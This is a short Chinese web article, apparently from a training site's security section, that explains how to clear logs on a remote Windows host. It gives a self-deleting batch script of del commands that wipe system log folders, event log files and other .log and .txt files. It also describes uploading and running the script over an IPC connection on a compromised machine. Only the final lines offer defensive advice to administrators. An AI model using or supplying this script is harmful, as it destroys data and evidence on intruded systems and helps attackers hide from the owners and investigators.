室内设计培训
平面设计培训
部落窝教育
网站首页 >> 网络安全 >> 文章内容

清除远程主机上的日志的方法

[日期:2010-03-21]   来源:IT部落窝  作者:IT部落窝   阅读:1095[字体: ]

  今天给大家介绍的清除远程主机上的日志的方法是:自己编写批处理文件来实现。

  编写一个能清除日志的批处理非常简单,新建一个文本文档,在其中输入以下内容: 
   @del c:\windows\system32\logfiles\*.*
   @del c:\windows\system32\config\*.evt
   @del c:\windows\system32\dtclog\*.*
   @del c:\windows\system32\*.log
   @del c:\windows\system32\*.txt
   @del c:\windows\*.txt
   @del c:\windows\*.log
   @del c:\del log.bat (实际使用时,视具体位置而定)

   把上面的内容保存为log.bat备用。在上面的代码中“@”前缀字符表示执行时本
行在命令行或DOS里面不显示。之后黑客通过IPC连接将log.bat文件上传到被入侵主机或肉鸡上,将log.bat文件执行以下就可以了。

  除此之外,还可以利用第三方软件等方法来实现清理目的,大体原理都一样。作为管理员应定期备份日志文件,防止被入侵后清空日志。另外可以把日志文件的路径更改,预防黑客用批处理文件清理日志。

IT部落窝PS,CDR,213班 分享到: QQ空间 新浪微博 腾讯微博 人人网
photoshop教程
Photoshop教程
平面设计教程
Photoshop教程